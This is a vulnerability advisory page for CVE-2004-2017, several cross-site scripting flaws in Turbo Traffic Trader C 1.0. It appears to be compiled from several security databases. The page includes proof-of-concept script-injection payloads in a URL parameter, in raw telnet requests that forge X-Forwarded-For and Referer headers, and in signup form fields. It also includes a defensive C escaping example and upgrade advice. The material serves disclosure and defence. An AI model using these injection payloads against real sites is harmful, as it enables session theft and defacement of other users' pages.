CVE-2004-2017
CVSS 4.3
Published: 2004-12-31 00:00:00
Revised: 2016-10-17 23:04:55

[Original] Multiple cross-site scripting (XSS) vulnerabilities in Turbo Traffic Trader C (TTT-C) 1.0 allow remote attackers to inject arbitrary HTML or web script, as demonstrated via (1) the link parameter to ttt-out, (2) the X-Forwarded-For header in a GET request to ttt-in, (3) the Referer header in a GET request to ttt-in, or the (4) site name or (5) site URL fields in the main control panel.


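[CNNVD] TurboTrafficTrader C Multiple Cross-Site Scripting and HTML Injection Vulnerabilities (CNNVD-200412-842)

        Turbo Traffic Trader C (TTT-C) version 1.0 contains multiple cross-site scripting (XSS) vulnerabilities. Remote attackers can use them to inject arbitrary HTML or web script, as demonstrated via (1) the link parameter of ttt-out, (2) the X-Forwarded-For header in a GET request to ttt-in, (3) the Referer header in a GET request to ttt-in, or the (4) site name or (5) site URL fields in the main control panel.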

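- CVSS (base score)

CVSS score: 4.3 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2017
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2017
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-842
(official data source) CNNVD

- Other links and resources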

http://marc.info/?l=bugtraq&m=108481571131866&w=2
(UNKNOWN)  BUGTRAQ  20040517 Multiple TTT-C XSS vulnerabilities
http://www.securityfocus.com/bid/10359
(UNKNOWN)  BID  10359
http://xforce.iss.net/xforce/xfdb/16164
(UNKNOWN)  XF  turbotraffictraderc-multiple-xss(16164)

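- Vulnerability information

TurboTrafficTrader C Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Medium risk, cross-site scripting
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        Turbo Traffic Trader C (TTT-C) version 1.0 contains multiple cross-site scripting (XSS) vulnerabilities. Remote attackers can use them to inject arbitrary HTML or web script, as demonstrated via (1) the link parameter of ttt-out, (2) the X-Forwarded-For header in a GET request to ttt-in, (3) the Referer header in a GET request to ttt-in, or the (4) site name or (5) site URL fields in the main control panel.

- Advisories and patches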

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (24122)

TurboTrafficTrader C 1.0 Multiple Cross-Site Scripting and HTML Injection Vulnerabilities (EDBID:24122)
cgi webapps
2004-05-17 Verified
0 Kaloyan Olegov Georgiev
N/A
source: http://www.securityfocus.com/bid/10359/info

It has been reported that TurboTrafficTrader C does not properly sanitize input received from users. It has been conjectured that this may allow a remote user to launch cross-site scripting and HTML injection attacks.

The cross-site scripting issues could permit a remote attacker to create a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user.

The HTML injection issues could allow an attacker to post malicious HTML and script code that would then later be rendered in the web browser of further visitors to the affected site.

These attacks would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials. Other attacks are also possible.

http://www.example.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
http://www.example.com/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script>

export REMOTE_ADDR="127.0.0.1<script>alert('ip_inject');</script>"
./ttt-in will load one bad record for IP
export HTTP_X_FORWARDED_FOR="10.0.0.1<script>alert('proxy insertion');</script>" 
./ttt-in will load an XSSed proxy record

Raw connection example:
telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.1<script>alert('proxy_insert');</script>
Host: www.example.com

telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.6<script>alert('proxy_insert');</script>
Referer: http://www.referrer.com"<script>alert('referrer_inject');</script>"
Host: www.example.com

When signing up for a new account:
Site name = Name"<script>window.open('http://www.example.com');</script>
Site URL = http://www.example.com"<script>alert('name_inject');</script>
Webmaster e-mail = email@example.com"<script>alert('email_inject');</script>
Webmaster ICQ = 123456"<script>alert('ICQ_inject');</script>		
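
Added example (not part of the original advisory or of TTT-C's code): the header values shown above handled defensively in a C CGI, by accepting the proxy address only when it parses as an IP literal and HTML-encoding everything written into a page. The helper names and the `<td>` output format are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

/* HTML-escape src into dst. Returns 0 on success, -1 if dst is too small. */
int html_escape(const char *src, char *dst, size_t dstlen) {
    size_t o = 0;
    if (dstlen == 0) return -1;
    for (; *src; src++) {
        char one[2] = { *src, '\0' };
        const char *rep = one;          /* default: copy the byte unchanged */
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = strlen(rep);
        if (o + n + 1 > dstlen) return -1;   /* keep room for the NUL */
        memcpy(dst + o, rep, n);
        o += n;
    }
    dst[o] = '\0';
    return 0;
}

/* 1 only for a single IPv4/IPv6 literal. A real X-Forwarded-For header may
   hold a comma-separated list; this constructed example accepts one address. */
int is_ip_literal(const char *s) {
    unsigned char buf[16];              /* large enough for an IPv6 address */
    if (s == NULL || strlen(s) >= INET6_ADDRSTRLEN) return 0;
    return inet_pton(AF_INET, s, buf) == 1 || inet_pton(AF_INET6, s, buf) == 1;
}

/* Hypothetical helper: one stats-table cell for a logged proxy address. */
int render_proxy_cell(const char *xff, char *out, size_t outlen) {
    char esc[128];
    if (html_escape(is_ip_literal(xff) ? xff : "invalid", esc, sizeof esc)) return -1;
    int n = snprintf(out, outlen, "<td>%s</td>", esc);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void) {
    /* X-Forwarded-For value copied from the raw request shown above */
    const char *xff = "192.168.0.1<script>alert('proxy_insert');</script>";
    char cell[160];
    if (render_proxy_cell(xff, cell, sizeof cell) == 0) puts(cell);
    return 0;
}
```

Validation on input and encoding on output are both applied here: the address check rejects the malformed header before it is stored, and the escaping still covers free-text fields such as the Referer or site name, which cannot be restricted to a fixed syntax.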

- Vulnerability information

6339
TTT-C ttt-out Link Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Turbo Traffic Trader C (TTT-C) contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate "link" variables upon submission to the "ttt-out" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- Timeline

2004-05-16 Unknown
2004-05-16 Unknown

- Solution

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
